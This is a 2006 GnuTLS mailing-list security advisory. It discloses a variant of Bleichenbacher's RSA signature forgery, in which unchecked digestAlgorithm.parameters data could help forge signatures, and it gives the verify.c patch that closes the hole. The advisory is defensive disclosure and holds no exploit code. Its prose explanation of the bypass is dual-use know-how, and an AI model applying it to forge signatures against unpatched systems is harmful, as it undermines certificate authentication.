[Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack

help-gnutls

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack

From:	Simon Josefsson
Subject:	[Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack
Date:	Fri, 08 Sep 2006 17:44:13 +0200
User-agent:	Gnus/5.110006 (No Gnus v0.6) Emacs/22.0.50 (gnu/linux)

The GNUTLS-SA-2006-4 security problem (fixed in 1.4.3) is a variant of
Bleichenbacher's latest attack:

http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html

The difference is that it uses the digestAlgorithm.parameters field to
store "garbage" instead of after the ASN.1 blob.  The optional
parameters field is not used for MD5/SHA1, but instead of verifying
that the field is not present, GnuTLS just ignored it.  Therefor, it
can be used to store garbage data in.

This problem was reported to us by Yutaka Oiwa, Kazukuni Kobara,
Hajime Watanabe and hopefully their original report with more
background will be available soon.

The patch that fixes this is for lib/x509/verify.c, see below.

This has been installed on the GnuTLS 1.5 branch, but I don't intend
to release 1.5.1 soon.  Try the nightly snapshots, or 1.4.3 instead.

/Simon

Update of /cvs/gnutls/gnutls/lib/x509
In directory trithemius:/tmp/cvs-serv3577

Modified Files:
      Tag: gnutls_1_4_x
        verify.c 
Log Message:
Make sure the digestAlgorithm.parameters field is empty, which it has
to be for the hashes we support.  Otherwise, the field can encode
"garbage" that might be used to make the signature be a perfect cube,
similar (but not identical) to Bleichenbacher's Crypto 06 rump session
attack.

--- /cvs/gnutls/gnutls/lib/x509/verify.c        2005/11/07 23:28:02     1.52
+++ /cvs/gnutls/gnutls/lib/x509/verify.c        2006/09/08 13:38:55     1.52.2.1
 <at>  <at>  -1,5 +1,5  <at>  <at> 
 /*
- * Copyright (C) 2003, 2004, 2005 Free Software Foundation
+ * Copyright (C) 2003, 2004, 2005, 2006 Free Software Foundation
  *
  * Author: Nikos Mavroyanopoulos
  *
 <at>  <at>  -505,6 +505,15  <at>  <at> 
       return GNUTLS_E_UNKNOWN_HASH_ALGORITHM;
     }

+  len = sizeof (str) - 1;
+  result = asn1_read_value (dinfo, "digestAlgorithm.parameters", NULL, &len);
+  if (result != ASN1_ELEMENT_NOT_FOUND)
+    {
+      gnutls_assert ();
+      asn1_delete_structure (&dinfo);
+      return _gnutls_asn2err (result);
+    }
+
   result = asn1_read_value (dinfo, "digest", digest, digest_size);
   if (result != ASN1_SUCCESS)
     {

[Prev in Thread]

Current Thread

[Next in Thread]

[Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack, Simon Josefsson <=

Prev by Date: [Help-gnutls] GnuTLS 1.4.3
Next by Date: [Help-gnutls] Re: Bleichenbacher RSA signature forgery attack and GnuTLS
Previous by thread: [Help-gnutls] GnuTLS 1.4.3
Next by thread: [Help-gnutls] GnuTLS 1.4.4
Index(es):
- Date
- Thread